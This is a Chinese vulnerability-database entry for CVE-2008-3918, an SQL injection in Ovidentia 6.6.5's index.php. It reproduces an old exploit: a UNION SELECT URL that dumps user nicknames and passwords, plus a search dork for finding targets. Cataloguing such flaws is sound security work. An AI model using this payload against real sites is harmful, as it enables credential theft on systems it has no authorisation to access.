Ovidentia 'index.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115881 漏洞类型 SQL注入
发布时间 2008-08-11 更新时间 2008-09-04
CVE编号 CVE-2008-3918 CNNVD-ID CNNVD-200809-066
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6232
https://www.securityfocus.com/bid/80932
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-066
|漏洞详情
Ovidentia,一个开放源码的内容管理系统和多用户协作平台。Ovidentia6.6.5版本中的index.php存在SQL注入漏洞。远程攻击者可以借助一个搜索操作中的字段参数,执行任意的SQL指令。
|漏洞EXP
#####################################################################################
####                       Ovidentia 6.6.5 Sql Injection                         ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : www.ovidentia.org                                                #
#                                                                                   #
#DORK : "Powered by Ovidentia"                                                      #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
#                                                                                   #
#                                     [Note]                                        #
#                                                                                   #
#You must login by a simple user and then use bug  ;)                                 #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-08-11]
|受影响的产品
Ovidentia ovidentia 6.6.5
|参考资料

来源:XF
名称:ovidentia-field-sql-injection(45940)
链接:http://xforce.iss.net/xforce/xfdb/45940
来源:SECUNIA
名称:31425
链接:http://secunia.com/advisories/31425